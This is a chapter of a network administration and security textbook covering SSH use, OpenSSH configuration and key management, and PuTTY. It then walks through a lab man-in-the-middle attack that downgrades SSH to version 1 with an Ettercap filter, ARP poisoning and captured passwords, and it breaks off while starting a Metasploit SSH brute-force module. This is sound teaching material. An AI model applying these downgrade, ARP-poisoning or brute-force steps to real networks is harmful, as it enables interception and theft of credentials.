Network Services - Cyber Operations: Building, Defending, and Attacking Modern Computer Networks (2015)

Cyber Operations: Building, Defending, and Attacking Modern Computer Networks (2015)

9. Network Services

Mike O’Leary1


Department of Mathematics, Towson University, Towson, MD, US


An administrator running a network needs to securely provide services to users. This chapter provides an introduction to a number of common network services.

Secure Shell, or SSH, is used to provide remote access to systems. It is typically used to provide command-line access, but SSH can also be used with an X Server to provide a full graphical interface. SSH can also be used as a way to send files using sftp and scp. Although SSH is robust, it is not without its security issues. When using passwords for authentication, it is vulnerable to a brute force attack, and servers that support SSH protocol 1 are vulnerable to man in the middle attacks.

FTP servers are an older way to share files. Today, FTP servers are used primarily to share files publicly, as though the protocol allows for the use of authentication, it passes credentials in plain text. The Linux distributions considered in this book include the vsftpd server to allow them to be configured as FTP servers.

Windows file servers can be built from Windows Server 2008 and 2012 and incorporated into an existing domain infrastructure. These servers can be configured to provide their file share as a drive letter for Windows clients, either in the form of individual file shares for individual users, or as a common file share for a group of users. Similar services can be provided by Linux servers running Samba.

Remote Desktop allows users to obtain a remote, full graphical user interface on a Windows system. Remote desktop can be configured as part of a domain’s group policies. Linux clients such as Remmina and rdesktop can connect to Windows remote desktop servers.


If a host is running an SSH server, connect to it by providing the username and host, then authenticating

skowalevsky@pollux:∼> ssh sgermain@spica.stars.example

The authenticity of host ’spica (’ can’t be established.

RSA key fingerprint is 9c:68:16:c5:f4:fa:36:0c:34:e4:29:00:39:22:95:ea.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added ’spica,’ (RSA) to the list of known hosts.

sgermain@spica’s password:

Last login: Sat Oct 25 19:37:22 2014

[sgermain@Spica ∼]$

The first time a user connects to an SSH server, the server provides their public key and displays the fingerprint of that key. If the user accepts the public key, it is stored locally on the client. Subsequent connections to the same server from that client check the presented public key against the stored key. If they do not match, the user is warned, and the connection is prohibited.

skowalevsky@pollux:∼/.ssh> ssh sgermain@spica





Someone could be eavesdropping on you right now (man-in-the-middle attack)!

It is also possible that the RSA host key has just been changed.

The fingerprint for the RSA key sent by the remote host is


Please contact your system administrator.

Add correct host key in /home/skowalevsky/.ssh/known_hosts to get rid of this message.

Offending key in /home/skowalevsky/.ssh/known_hosts:2

RSA host key for spica has changed and you have requested strict checking.

Host key verification failed.

In addition to providing shell access, OpenSSH has two programs that can be used to manipulate files on the remote server. The tool sftp provides an interactive command-line environment to upload and download files from the remote host.

skowalevsky@pollux:∼> sftp sgermain@spica.stars.example

Connecting to spica.stars.example...

sgermain@spica.stars.example’s password:

sftp> help

Available commands:

cd path Change remote directory to ’path’

lcd path Change local directory to ’path’

chgrp grp path Change group of file ’path’ to ’grp’

chmod mode path Change permissions of file ’path’ to ’mode’

chown own path Change owner of file ’path’ to ’own’

help Display this help text

get remote-path [local-path] Download file

lls [ls-options [path]] Display local directory listing

ln oldpath newpath Symlink remote file

lmkdir path Create local directory

lpwd Print local working directory

ls [path] Display remote directory listing

lumask umask Set local umask to ’umask’

mkdir path Create remote directory

progress Toggle display of progress meter

put local-path [remote-path] Upload file

pwd Display remote working directory

exit Quit sftp

quit Quit sftp

rename oldpath newpath Rename remote file

rmdir path Remove remote directory

rm path Delete remote file

symlink oldpath newpath Symlink remote file

version Show SFTP version

!command Execute ’command’ in local shell

! Escape to local shell

? Synonym for help


To copy a single file, the tool scp can be used.

skowalevsky@pollux:∼> scp ./testfile sgermain@spica.stars.example:/home/sgermain/Desktop/testfile

sgermain@spica.stars.example’s password:

testfile 100% 75 0.1KB/s 00:00

The syntax is similar to the standard file copy program cp, save that now the source or destination can be a remote system specified as user@host:file.

Installing OpenSSH Server on Linux

The OpenSSH server is available for all of the Linux distributions under consideration. On CentOS systems OpenSSH is installed and set to start on boot and the proper port (TCP/22) is open in the firewall. If the service is not already installed, it can be installed with the command

[root@Spica ∼]# yum install openssh-server

To check the status of the sever, run the command

[root@Spica ∼]# service sshd status

openssh-daemon (pid 3012) is running

To restart the server, run

[root@Spica ∼]# service sshd restart

Stopping sshd: [ OK ]

Starting sshd: [ OK ]

The same syntax is used to stop or start the service. To verify that OpenSSH is set to start on boot, use the command

[root@Spica ∼]# chkconfig --list sshd

sshd 0:off 1:off 2:on 3:on 4:on 5:on 6:off

This shows that OpenSSH is set to start with boot in runlevel 5, the default runlevel for CentOS.1 The chkconfig command can be used to enable or disable a service in one or more runlevels. For example, to disable OpenSSH in runlevel 4, run the command

[root@Spica ∼]# chkconfig --level 4 sshd off

[root@Spica ∼]# chkconfig --list sshd

sshd 0:off 1:off 2:on 3:on 4:off 5:on 6:off

CentOS includes the graphical tool /usr/sbin/system-config-services to manage system services (Figure 9-1). It appears in the menu in different places (CentOS 5.x: System ➤ Administration ➤ Server Settings ➤ Services; CentOS 6.x: System ➤ Administration ➤ Services). The tool allows the user to start/stop/restart system services, as well as enable/disable them for subsequent system restarts.


Figure 9-1.

Configuring Services on CentOS 6.2

OpenSSH server is installed by default on OpenSuSE, though the service is not started by default in later releases (11.2+). If OpenSSH server is not installed, the package can be installed with the command

nunki:∼ # zypper install openssh

The service is managed from the command line with chkconfig and service in the same fashion as CentOS systems, though later versions of OpenSuSE (12.1+) use a different back end for service initialization (systemd instead of SysVinit), and so the syntax and responses may vary. For example, on OpenSuSE 12.1, to configure OpenSSH to start on boot, run the commands

nunki:∼ # chkconfig --list sshd

Note: This output shows SysV services only and does not include native

systemd services. SysV configuration data might be overridden by native

systemd configuration.

sshd 0:off 1:off 2:off 3:off 4:off 5:off 6:off

nunki:∼ # chkconfig sshd 35

nunki:∼ # chkconfig --list sshd

Note: This output shows SysV services only and does not include native

systemd services. SysV configuration data might be overridden by native

systemd configuration.

sshd 0:off 1:off 2:off 3:on 4:off 5:on 6:off

To see if the OpenSSH service is running, use the service command

nunki:∼ # service sshd status

redirecting to systemctl

sshd.service - LSB: Start the sshd daemon

Loaded: loaded (/etc/init.d/sshd)

Active: active (running) since Fri, 24 Oct 2014 14:52:14 -0400; 1s ago

Process: 2519 ExecStart=/etc/init.d/sshd start (code=exited, status=0/SUCCESS)

CGroup: name=systemd:/system/sshd.service

└ 2533 /usr/sbin/sshd -o PidFile=/var/run/

The OpenSUSE graphical tool to manage services is YaST (Figure 9-2), which is available from the main menu. From the YaST control center, select System, then either System Services (Runlevel), System Services, or System Manager depending on the particular OpenSuSE release. A separate dialog box is launched that allows the user to configure the services running on the system.


Figure 9-2.

Using YaST to Configure the OpenSSH Server on OpenSuSE 11.4

YaST is also used to open the necessary ports in the firewall.

OpenSSH is not installed by default on Ubuntu or Mint systems, but it can be installed with apt-get; the package name is openssh-server.

rdescartes@heart:∼$ sudo apt-get install openssh-server

Once OpenSSH is installed, it is started and configured to start on boot; this can be verified with

rdescartes@heart:∼$ sudo service ssh status

ssh start/running, process 613

Notice that the name of the service is ssh rather than sshd. OpenSSH can be started, stopped, and restarted with the service command in the same fashion. Older versions (Mint 5, Ubuntu 8.04) do not have a service command; OpenSSH is started, stopped, or restarted directly from the script in /etc/init.d

ghardy@dumbbell:∼$ sudo /etc/init.d/ssh start

* Starting OpenBSD Secure Shell server sshd [ OK ]

Configuring OpenSSH Server on Linux

Configuration for the OpenSSH server is contained in the file /etc/ssh/sshd_config. To understand the configuration process, consider as typical the following configuration file taken from CentOS 5.8; the configuration file for other distributions is similar. The file begins

# $OpenBSD: sshd_config,v 1.73 2005/12/06 22:38:28 reyk Exp $

# This is the sshd server system-wide configuration file. See

# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/local/bin:/bin:/usr/bin

# The strategy used for options in the default sshd_config shipped with

# OpenSSH is to specify options with their default value where

# possible, but leave them commented. Uncommented options change a

# default value.

#Port 22

#Protocol 2,1

Protocol 2

#AddressFamily any


#ListenAddress ::

The start of the configuration file indicates the port (TCP/22) and the IP addresses (all IPv4 and IPv6) that sshd listens on. There are two versions of the SSH protocol: version 1 and version 2. The default behavior of this version of OpenSSH is to use protocol 2 while allowing a client to downgrade to protocol 1 on request; this is overridden by the subsequent option that forces OpenSSH to only use protocol 2. Later versions of OpenSSH use protocol 2 by default and require the administrator to explicitly allow a downgrade to protocol 1. Protocol 1 is flawed and should not be used; even allowing a client to downgrade to protocol 1 opens the system up attack.

The configuration file continues with information about the locations of the host keys, which in this instance are stored in their default locations.

# HostKey for protocol version 1

#HostKey /etc/ssh/ssh_host_key

# HostKeys for protocol version 2

#HostKey /etc/ssh/ssh_host_rsa_key

#HostKey /etc/ssh/ssh_host_dsa_key

# Lifetime and size of ephemeral version 1 server key

#KeyRegenerationInterval 1h

#ServerKeyBits 768

Each key comes as a pair, with a private key and a public key; the public key has the same name but with the file extension .pub; so for example the RSA private key in this example is named /etc/ssh/ssh_host_rsa_key and the corresponding public key is named /etc/ssh/ Later versions of OpenSSH allow for the use of elliptic key cryptography; the default location for these keys is /etc/ssh/ssh_host_ecdsa_key and the configuration file usually contains an additional line of the form

#HostKey /etc/ssh/ssh_host_ecdsa_key

Keys come in different sizes; the size of a key can be checked with the tool openssl. For example, to find the size of the RSA key, run the command

fomalhaut:∼ # openssl rsa -text -noout -in /etc/ssh/ssh_host_rsa_key

Private-Key: (2048 bit)



... Output Deleted ...

This shows that the RSA key is 2048 bits. Similarly, to find the key size for the DSA key and ECDSA key, run the commands

fomalhaut:∼ # openssl dsa -text -noout -in /etc/ssh/ssh_host_dsa_key

read DSA key

Private-Key: (1024 bit)

... Output Deleted ...

fomalhaut:∼ # openssl ec -text -noout -in /etc/ssh/ssh_host_ecdsa_key

read EC key

Private-Key: (256 bit)

... Ouput Deleted ...

These show that the DSA private key is 1024 bits and the ECDSA private key is 256 bits. Each of these was run against a default OpenSuSE 12.2 installation.

The National Institute of Science and Technology (NIST) has made recommendations for key sizes in NIST Special Publication 800-57, Part 1, Revision 3. They compare different algorithms and estimate the number of bits of security provided by each. They also make recommendations as to which should be used for sensitive but unclassified data; these are summarized in Table 9-1.

Table 9-1.

Comparable Cryptographic Strengths and NIST Recommendations. Taken from NIST Special Publication 800-57, Part 1, Revision 3 (, Tables 2 and 4

Bits of Security

DSA (Public key size / Private key size)

RSA (Key size)

ECDSA (Key Size)



1024 / 160



Deprecated in 2011–2013; disallowed thereafter


2048 / 224



Acceptable through 2030


3072 / 256



Acceptable beyond 2030

Older versions of OpenSuSE (11.0-11.4) use default RSA keys with 1024 bits; all of the other Linux distributions discussed in this text use 2048 bits. These keys can be replaced with larger 2048 bit keys with ssh-keygen.

diphda:/etc/ssh # ssh-keygen -t rsa -b 2048 -f /etc/ssh/ssh_host_rsa_key

Generating public/private rsa key pair.

/etc/ssh/ssh_host_rsa_key already exists.

Overwrite (y/n)? y

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /etc/ssh/ssh_host_rsa_key.

Your public key has been saved in /etc/ssh/

The key fingerprint is:

79:37:aa:c6:11:83:f3:01:26:2c:ee:27:b1:c8:be:dd root@diphda

The key’s randomart image is:

+--[ RSA 2048]----+

| . |

| . o o |

| . . o o |

| o o +. |

|.o o oS+. o |

|..+ . o. o . |

|. o . .. |

| .. . o. |

| ... E .. |


Here the -t flag specifies the type of key to be generated (RSA), the -b flag specifies the size of the key (2048 bits) and the -f flag specifies the name of the output file. A passphrase can be used to protect keys generated by OpenSSL. However, if a passphrase is used, then OpenSSH would be unable to start without it. For this reason passphrases are rarely used to protect server keys. Once the key is changed, the server needs to be restarted via the service command.

OpenSSH keys are generated the first time the daemon is started. If OpenSSH is running on a virtual machine and that virtual machine is copied/cloned, then the copy/clone will have the same public and private keys as the original system. This can open the system up to a man in the middle attack.

Returning to the configuration file /etc/ssh/sshd_config, it continues with settings for logging.

# Logging

# obsoletes QuietMode and FascistLogging

#SyslogFacility AUTH

SyslogFacility AUTHPRIV

#LogLevel INFO

Note that CentOS overrides the default log facility (auth) and replaces it with authpriv. This behavior is particular to CentOS distributions, and is not replicated by OpenSuSE/Mint/Ubuntu. The LogLevel can take the values quiet, fatal, error, info, verbose, debug1, debug2, or debug3, with later values recording more data than earlier ones.

Next, the configuration file contains basic settings for authentication.

# Authentication:

#LoginGraceTime 2m

#PermitRootLogin yes

#StrictModes yes

#MaxAuthTries 6

By default, a user has two minutes and six attempts to successfully authenticate before the connection is closed.

The root user can also log in directly as root; this is the default behavior and a security problem. There is usually no benefit to allowing this; a user that needs root credentials remotely should log in as a regular user and use sudo (or su) to execute administrative commands. Preventing direct root login provides an audit trail for the use of the privileged accounts.

The configuration file next contains the settings for public key authentication; these have their default values.

#RSAAuthentication yes

#PubkeyAuthentication yes

#AuthorizedKeysFile .ssh/authorized_keys

Public key authentication can be used in place of passwords. Suppose that a user on one system (the client) wants to use public key authentication to connect via SSH to a second system (the server). The user’s first step is to construct a key pair for the user on the client. This is done with the tool ssh-keygen, for example, to generate a 2048-bit RSA key pair, a user on the client runs the command

oolenik@fomalhaut:∼> ssh-keygen -t rsa -b 2048

Generating public/private rsa key pair.

Enter file in which to save the key (/home/oolenik/.ssh/id_rsa):

Created directory ’/home/oolenik/.ssh’.

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /home/oolenik/.ssh/id_rsa.

Your public key has been saved in /home/oolenik/.ssh/

The key fingerprint is:

4c:f8:09:3e:c8:bb:bd:c3:3f:31:e6:60:b0:a9:2b:28 oolenik@fomalhaut

The key’s randomart image is:

+--[ RSA 2048]----+

| |

| . |

| o . |

| ..o = . |

| o+o S |

| o.o.+ |

|. ..o + o |

|E . oo o |

|..... o+.. |


Next, the user copies the public key to the server. The username on the client does not have to be the same as the username on the server; in fact they can be completely unrelated. Moreover, the same key pair can be used to authenticate as different usernames on the server. For each username on the server, OpenSSH stores the public keys that can be used to login to that username in the authorized keys file, ∼/.ssh/authorized_keys (specified by the configuration file) within the home directory for that username. Each username has a different authorized keys file.

To copy the public key from the client to the server, the user can run ssh-copy-id on the client, specifying the remote server and username, then authenticate via passwords.

oolenik@fomalhaut:∼> ssh-copy-id cgauss@alnitak

cgauss@alnitak’s password:

Now try logging into the machine, with "ssh ’cgauss@alnitak’", and check in:


to make sure we haven’t added extra keys that you weren’t expecting.

This copies the public key from the user oolenik on the client to the authorized keys file for the user cgauss on the server. A check on the server by the user cgauss shows that the public key has been copied:

[cgauss@alnitak ∼]$ cat ∼/.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDt4ZYhxyffln7EgZDWFzKhtplVw/5kOc711/VE6P96d6LZJL1s4KBV7oP4PWT7ubacfkkEzGRn3sG2qm64jWzfNwdJpZxcHBJrPG/EqYNIRTzXf8GJ3F0SBpDmNCBHqBJJecFUxd2AbR6LAL93BYI1FEo49fRtQgGjmlS7WSR5j3UduyNlflBAbnU36f2jQps0369OYhBy49dKBkYS6oLJwjUttsghDpyu266UDhBRXz8jkjUoYuUUlpTpBhmU1iS43SiKZUDUpRi8A3/Zmigz8vZP4LtmjhMC8Z8YtHFcej/zIL1TNvgW2L5FU2ofV+N7GWkgBh1Z9EwfPi0o+vU/ oolenik@fomalhaut

Subsequent connections to the server from the same client and the same user can then be made without a password.

oolenik@fomalhaut:∼> ssh cgauss@alnitak

Last login: Sat Oct 25 13:19:46 2014 from

cgauss@alnitak ∼]$

This same key can be copied to the same server for a different username and used in the same fashion.

oolenik@fomalhaut:∼> ssh-copy-id amarkov@alnitak

amarkov@alnitak’s password:

Now try logging into the machine, with "ssh ’amarkov@alnitak’", and check in:


to make sure we haven’t added extra keys that you weren’t expecting.

oolenik@fomalhaut:∼> ssh amarkov@alnitak

[amarkov@alnitak ∼]$

Some versions of ssh-copy-id require that the location of the identity file be manually specified with the -i flag.

The use of a key can be restricted by configuring the authorized keys file. For example to only allow a key to be accepted only from either the host named fomalhaut.stars.example or the (different) IP address, update the authorized keys file with a from directive.

[cgauss@alnitak ∼]$ cat ∼/.ssh/authorized_keys

from="fomalhaut.stars.example," ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDt4ZYhxyffln7EgZDWFzKhtplVw/5kOc711/VE6P96d6LZJL1s4KBV7oP4PWT7ubacfkkEzGRn3sG2qm64jWzfNwdJpZxcHBJrPG/EqYNIRTzXf8GJ3F0SBpDmNCBHqBJJecFUxd2AbR6LAL93BYI1FEo49fRtQgGjmlS7WSR5j3UduyNlflBAbnU36f2jQps0369OYhBy49dKBkYS6oLJwjUttsghDpyu266UDhBRXz8jkjUoYuUUlpTpBhmU1iS43SiKZUDUpRi8A3/Zmigz8vZP4LtmjhMC8Z8YtHFcej/zIL1TNvgW2L5FU2ofV+N7GWkgBh1Z9EwfPi0o+vU/ oolenik@fomalhaut

The structure of the file remains unchanged; in particular the entire command still occurs on a single line.

In the example, the user did not specify a passphrase for their key, but this is not a good security practice. The process of using a key protected with a passphrase is similar to using an unprotected key. Start by generating a key on the client, providing a real passphrase.

kowalevsky@pollux:∼> ssh-keygen -t rsa -b 2048

Generating public/private rsa key pair.

Enter file in which to save the key (/home/skowalevsky/.ssh/id_rsa):

Created directory ’/home/skowalevsky/.ssh’.

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /home/skowalevsky/.ssh/id_rsa.

Your public key has been saved in /home/skowalevsky/.ssh/

The key fingerprint is:

c9:fd:01:24:c2:c1:cf:e3:9b:64:87:b0:fb:d2:2e:e0 skowalevsky@pollux

Copy the key from the client to the server as before.

skowalevsky@pollux:∼> ssh-copy-id -i /home/skowalevsky/.ssh/id_rsa amarkov@alnitak

amarkov@alnitak’s password:

Now try logging into the machine, with "ssh ’amarkov@alnitak’", and check in:


Now when the user on the client tries to login to the server, they need to provide the passphrase for their key

skowalevsky@pollux:∼> ssh amarkov@alnitak

Enter passphrase for key ’/home/skowalevsky/.ssh/id_rsa’:

Last login: Sat Oct 25 15:49:09 2014 from fomalhaut.stars.example

[amarkov@alnitak ∼]$

A user that regularly works with passphrase-protected public keys can take advantage of an ssh-agent. Run the program ssh-add, and provide the passphrase for SSH keys.

skowalevsky@pollux:∼> ssh-add

Enter passphrase for /home/skowalevsky/.ssh/id_rsa:

Identity added: /home/skowalevsky/.ssh/id_rsa (/home/skowalevsky/.ssh/id_rsa)

Once the agent is provided the passphrase, it is no longer necessary for the user to provide the passphrase key.

skowalevsky@pollux:∼> ssh amarkov@alnitak

Last login: Sat Oct 25 19:42:59 2014 from pollux.stars.example

This behavior persists until the user logs out from the system.

Returning to the OpenSSH server configuration file /etc/ssh/sshd_config, the next few components configure alternative approaches to authentication. For example, authentication can be performed on a per-host, rather than on a per-user basis. It is also possible to disable the use of passwords for authentication entirely.

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts

#RhostsRSAAuthentication no

# similar for protocol version 2

#HostbasedAuthentication no

# Change to yes if you don’t trust ∼/.ssh/known_hosts for

# RhostsRSAAuthentication and HostbasedAuthentication

#IgnoreUserKnownHosts no

# Don’t read the user’s ∼/.rhosts and ∼/.shosts files

#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!

#PasswordAuthentication yes

#PermitEmptyPasswords no

PasswordAuthentication yes

The last major section of the OpenSSH server configuration file collects a number of options. One option is whether to allow X11 forwarding.

#X11Forwarding no

X11Forwarding yes

#X11DisplayOffset 10

#X11UseLocalhost yes

Because this configuration permits X11 forwarding, a user connecting to the SSH server passing the -X flag can run graphical programs on the remote server and have them displayed locally on the client. For example, a user can run a Firefox browser on the server while displaying the browser in the client. To do so, the user connects to the remote SSH server passing the –X flag, then launches Firefox from the command line (Figure 9-3).


Figure 9-3.

Illustration of X forwarding. The client system (OpenSuSE 11.0) connected to an OpenSSH server (CentOS 5.8) using the -X Flag. The Firefox browser is running on the server but displayed on the client

Other options include whether OpenSSH should display the message of the day (/etc/motd), whether it should print the last time the user logged into the system, or whether it should display a banner to users who log in.

OpenSSH Clients on Windows

A common client for SSH on Windows is PuTTY, available from . Its general use is straightforward. Launch the program, then provide the IP Address or DNS name of the SSH Server and select Open (Figure 9-4). Settings can be saved by giving the session a name and selecting Save.


Figure 9-4.

Configuring PuTTY on Windows 7

Once the connection is made, the user is prompted to input a username to log in as and to provide their password (Figure 9-5). The remote user name can also be specified in advance by changing the Auto-login username contained in Connection ➤ Data.


Figure 9-5.

Using PuTTY on Windows 7

PuTTY can also use public key authentication. To generate a key pair, run the program puttygen.exe (Figure 9-6), which is another member of the full PuTTY suite. Use the generate button to create a key pair; the default is a 2048-bit RSA key pair.


Figure 9-6.

Generating a Key Pair for PuTTY, on Windows 7

Once the key is generated, log on to the remote system using a password, then paste the public key into the remote authorized keys file:

[cgauss@alnitak ∼]$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAqPaUWtLvGk7aqty6ZtCueWHoZl9RwtFyzXY9g/3bLb/0+4N8GpNP3Xgogf6yhlUMy3Kpe/G5VDHeCQ9XcjLfTeSMvGNP7wMAzHA289kB812RLW/u038/IcoNnpSBwfEKDWGUtqNh24WNw1RS/O//cAUgkOUcBk9eN/yH+ZNdhBVDc6fLMtHvIsQtO/QKLcv++dwtHYDIw/rHx8MhT9+E9EchVwG7V+au+6e6wqRb/miXCOdc2Q1FZzvfzgzgvGC3joaYrEUADnvPccKrfzb9apKB5tULTogVE3oG2XBuFb/zw2OBcVH05G3i0t/Qj3kFWEAfxeakRbSsMOIEjjOJRQ== rsa-key-20141026" >> .ssh/authorized_keys

[cgauss@alnitak ∼]$

To use the key in PuTTY, navigate Connection ➤ SSH ➤ Auth, and provide the private key file. If the key is protected by a passphrase, then PuTTY will prompt the user for the passphrase each time a connection is started before allowing the connection.

Another tool in the PuTTY suite is pagent.exe. When run, the program minimizes itself to the system tray. Right-click on the program, select Add Key, then provide the location of a PuTTY private key file. The agent asks the user for the passphrase. Once provided, PuTTY uses that key without prompting again for the passphrase as long as the agent is running.

PuTTY can automatically load a saved session by starting it with the flag -load. This also works for shortcuts to the program. For example, a user can create a shortcut to PuTTY with the target

"C:\PATH-TO-PROGRAM\putty\PUTTY.EXE" -load "alnitak"

Then double-clicking on the shortcut loads the saved settings named alnitak. If public key authentication is used with a passphrase-protected key and a running pagent with a loaded key, then double-clicking on the shortcut directly opens the remote shell on the destination without requiring a password or passphrase.

Man in the Middle Attack against SSHv1

SSH servers that use protocol 1, even if it is only an option when chosen by the client, are vulnerable to man in the middle attacks. When NMap is used to scan the SSH port on such a server, it reports

root@kali:∼# nmap -sV -p22 alnitak.stars.example

Starting Nmap 6.46 ( ) at 2014-10-26 13:13 EDT

Nmap scan report for alnitak.stars.example (

Host is up (0.00023s latency).

rDNS record for Alnitak.stars.example


22/tcp open ssh OpenSSH 4.3 (protocol 1.99)

MAC Address: 08:00:27:07:71:B7 (Cadmus Computer Systems)

Service detection performed. Please report any incorrect results at .

Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds

The reported protocol version number, 1.99, indicates that the server prefers SSHv2, but will respond to SSHv1 if requested by a client.

This can be attacked via a man in the middle attack, using the tool Ettercap. As the name implies, a system performing a man in the middle attack must be between the two targets being attacked; usually this means being on the same subnet as the two systems. Consider a network configured as follows

· Network; -, netmask

· SSH Server: alnitak.stars.example at 08:00:27:07:71:B7 (CentOS 5.8)

· SSH Client #1: pollux.stars.example at 08:00:27:F9:58:86 (OpenSuSE 11.0)

· SSH Client #2: snake.nebula.example at 08-00-27-67-42-B2 (Windows 7)

· Attacking Kali System at 08:00:27:5C:13:B7

On the Kali system, start Ettercap by navigating the Kali main menu through Applications ➤ Internet ➤ Ettercap. Once started, configure Ettercap to launch unified sniffing by navigating the Ettercap main menu Sniff ➤ Unified Sniffing, and selecting a network interface.

Next, enumerate the hosts on the local network by navigating the Ettercap main menu, selecting Hosts ➤ Scan for hosts. This process sends ARP broadcast requests to every system on the local network; each host that returns an ARP reply is noted (Figure 9-7).


Figure 9-7.

List of Hosts Enumerated by Ettercap

Add the address of the SSH server to target 1 and the addresses of both clients to target 2. It is also possible to attack the underlying network hardware instead of the individual hosts.

To attack SSHv1, the attacker intercepts traffic between the client and the server. To ensure that the client requests SSHv1, the initial traffic from the server back to the client must be rewritten; instead of the server telling the client that both SSHv1 and SSHv2 are supported, the client is told that only SSHv1 is supported. This is done via the Ettercap filter /usr/share/ettercap/etter.filter.ssh; it contains the content

File 9-1. Contents of /usr/share/ettercap/etter.filter.ssh on Kali

if (ip.proto == TCP) {

if (tcp.src == 22) {

if ( replace("SSH-1.99", "SSH-1.51") ) {

msg("[SSH Filter] SSH downgraded from version 2 to 1\n");

} else {

if ( search(, "SSH-2.00") ) {

msg("[SSH Filter] Server supports only SSH version 2\n");

} else {

if ( search(, "SSH-1.51") ) {

msg("[SSH Filter] Server already supports only version 1\n");





To use the filter, it must first be compiled into an appropriate binary form. To do so and store the result in the file etter.filter.ssh.ef, run the command

root@kali:/usr/share/ettercap# etterfilter etter.filter.ssh -o etter.filter.ssh.ef

etterfilter 0.8.0 copyright 2001-2013 Ettercap Development Team

12 protocol tables loaded:

DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:


Parsing source file ’etter.filter.ssh’ done.

Unfolding the meta-tree done.

Converting labels to real offsets done.

Writing output to ’etter.filter.ssh.ef’ done.

-> Script encoded into 16 instructions.

To use the filter, from the Ettercap main menu, select Filters ➤ Load a Filter, and select the binary just created.

To direct traffic between the hosts through the attacking Kali system, ARP poisoning is used. Prior to the attack, a check of the ARP caches show nothing unusual on the server

[root@alnitak ∼]# arp -a

Antares.stars.example ( at 08:00:27:3F:77:DA [ether] on eth0

Spica.stars.example ( at 08:00:27:40:19:69 [ether] on eth0

? ( at 52:54:00:12:35:00 [ether] on eth0

There is nothing ununsal on the Linux client

pollux:∼ # arp -a

Antares.stars.example ( at 08:00:27:3F:77:DA [ether] on eth0

Fomalhaut.stars.example ( at 08:00:27:23:F6:E0 [ether] on eth0

There is also nothing unusual on the Windows client

C:\Users\Hermann Weyl>arp -a

Interface: --- 0xb

Internet Address Physical Address Type 52-54-00-12-35-00 dynamic ff-ff-ff-ff-ff-ff static 01-00-5e-00-00-16 static 01-00-5e-00-00-fc static 01-00-5e-7f-ff-fa static

From the Ettercap main menu, select Mitm ➤ Arp poisoning, and select Sniff Remote Connections. Then a check of the ARP caches shows that SSH server now associates the MAC address of the Kali system (08:00:27:5C:13:B7) with the IP addresses of both clients.

[root@alnitak ∼]# arp -a

Snake.nebula.example ( at 08:00:27:5C:13:B7 [ether] on eth0

Pollux.stars.example ( at 08:00:27:5C:13:B7 [ether] on eth0

Spica.stars.example ( at 08:00:27:40:19:69 [ether] on eth0

? ( at 52:54:00:12:35:00 [ether] on eth0

Similarly the Linux client now associates the MAC address of the Kali system (08:00:27:5C:13:B7) with the IP address of the server.

pollux:∼ # arp -a

Alnitak.stars.example ( at 08:00:27:5C:13:B7 [ether] on eth0

Fomalhaut.stars.example ( at 08:00:27:23:F6:E0 [ether] on eth0

In contrast, the Windows client has made no changes (yet) to its ARP tables.

C:\Users\Hermann Weyl>arp -a

Interface: --- 0xb

Internet Address Physical Address Type 52-54-00-12-35-00 dynamic 08-00-27-5c-13-b7 dynamic ff-ff-ff-ff-ff-ff static 01-00-5e-00-00-16 static 01-00-5e-00-00-fc static 01-00-5e-7f-ff-fa static

Though the ARP tables have been modified, Ettercap is not yet allowing traffic to flow between clients and the server. To do so, from the Ettercap main menu select Start ➤ Start Sniffing.

If one of these clients connects to the server, their traffic is routed through Ettercap. On the Linux system, the OpenSSH client does not enable SSHv1 by default, so the connection attempt is halted.

skowalevsky@pollux:∼> ssh cgauss@alnitak

Protocol major versions differ: 2 vs. 1


However, if the client connects using SSHv1 through the -1 option, then the connection is permitted. Moreover, even if the user has connected to this server before (using SSHv2) they are not warned of a potential man in the middle attack, but only that a different key is present.

skowalevsky@pollux:∼> ssh -1 cgauss@alnitak

WARNING: RSA key found for host alnitak

in /home/skowalevsky/.ssh/known_hosts:1

RSA key fingerprint 2f:2f:de:6b:19:92:8a:fe:6e:14:9c:42:88:a9:f3:37.

The authenticity of host ’alnitak (’ can’t be established

but keys of different type are already known for this host.

RSA1 key fingerprint is 77:41:3d:c0:51:2b:83:2f:8a:60:d2:4a:19:ae:84:b8.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added ’alnitak,’ (RSA1) to the list of known hosts.

cgauss@alnitak’s password:

Last login: Sun Oct 26 16:01:54 2014 from pollux.stars.example

Once the user enters their credentials, the attacker on Ettercap receives the following message

[SSH Filter] SSH downgraded from version 2 to 1

SSH : -> USER: cgauss PASS: password1!

Even though the user connects via SSHv1, Ettercap decodes the password sent by the user.

On the Windows client, PuTTY does not by default prevent a user from automatically downgrading to SSHv1.2 The user is warned that the host key has not been saved, but again without warning the user of a possible man in the middle attack (Figure 9-8).


Figure 9-8.

PuTTY Warning the User that the Server’s Key is not Cached

If the user connects, then Ettercap captures the plain text password

[SSH Filter] SSH downgraded from version 2 to 1

SSH : -> USER: amarkov PASS: password1!

A check of the ARP cache now shows the man in the middle.

C:\Users\Hermann Weyl>arp -a

Interface: --- 0xb

Internet Address Physical Address Type 52-54-00-12-35-00 dynamic 08-00-27-40-19-69 dynamic 08-00-27-5c-13-b7 dynamic 08-00-27-5c-13-b7 dynamic ff-ff-ff-ff-ff-ff static 01-00-5e-00-00-16 static 01-00-5e-00-00-fc static 01-00-5e-7f-ff-fa static

Brute Force Attacks against SSH

SSH servers that rely on passwords for authentication are at risk of a brute force attack. This risk is magnified if the server allows remote root access, as the attacker no longer needs to guess a user name while gaining root privileges with a successful attack.

Metasploit has a module that can be used in a brute force attack named auxiliary/scanner/ssh/ssh_login.

root@kali:∼# msfconsole -q

msf > workspace -a ssh_test

[*] Added workspace: ssh_test

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > info

Name: SSH Login Check Scanner

Module: auxiliary/scanner/ssh/ssh_login

License: Metasploit Framework License (BSD)

